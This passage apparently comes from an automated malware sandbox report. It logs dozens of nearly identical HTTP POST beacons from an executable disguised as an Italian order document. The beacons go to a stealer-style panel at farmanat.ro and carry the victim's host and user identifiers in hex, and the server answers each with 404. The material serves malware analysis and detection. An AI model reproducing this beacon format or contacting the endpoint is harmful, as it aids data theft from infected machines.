                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              295192.168.11.2050137176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:41.524483919 CET6726OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:41.558692932 CET6726OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:41.609107018 CET6727INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:40 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              296192.168.11.2050138176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:42.040785074 CET6727OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:42.075083971 CET6728OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:42.125179052 CET6728INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              297192.168.11.2050139176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:42.534729004 CET6729OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:42.568723917 CET6729OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:42.618726015 CET6729INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:41 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              298192.168.11.2050140176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:43.037328959 CET6730OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:43.071548939 CET6730OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:43.121603966 CET6731INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              299192.168.11.2050141176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:43.557050943 CET6731OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:43.590641975 CET6732OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:43.646503925 CET6732INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:42 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.11.2049822176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:01.719255924 CET6303OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:01.752748013 CET6303OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:01.885267019 CET6304INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              30192.168.11.2049865176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:21.038147926 CET6346OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:21.072483063 CET6346OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:21.125472069 CET6347INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              300192.168.11.2050142176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:44.009707928 CET6733OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:44.043785095 CET6733OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:44.100363970 CET6733INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              301192.168.11.2050143176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:44.527358055 CET6734OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:44.560985088 CET6734OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:44.614161015 CET6735INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:43 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              302192.168.11.2050144176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:45.039530993 CET6735OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:45.073008060 CET6736OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:45.122705936 CET6736INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              303192.168.11.2050145176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:45.509963989 CET6737OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:45.544240952 CET6737OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:45.598488092 CET6737INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              304192.168.11.2050146176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:45.990993977 CET6738OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:46.025037050 CET6738OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:46.081789017 CET6739INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              305192.168.11.2050147176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:46.446019888 CET6739OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:46.479511023 CET6740OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:46.528537989 CET6740INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              306192.168.11.2050148176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:46.964293957 CET6741OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:46.998600006 CET6741OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:47.048317909 CET6741INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              307192.168.11.2050149176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:47.480202913 CET6742OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:47.513799906 CET6742OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:47.564080954 CET6743INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              308192.168.11.2050150176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:47.989429951 CET6743OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:48.023612022 CET6744OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:48.077389002 CET6744INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              309192.168.11.2050151176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:48.492017984 CET6745OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:48.526269913 CET6745OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:48.577016115 CET6745INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:50:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              31192.168.11.2049866176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:21.765352011 CET6347OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:21.798989058 CET6348OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:21.848124981 CET6348INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              310192.168.11.2050152176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:50:48.956654072 CET6746OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:50:48.990220070 CET6746OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:50:49.039484978 CET6747INHTTP/1.1 404 Not Found
                                              Server: nginx
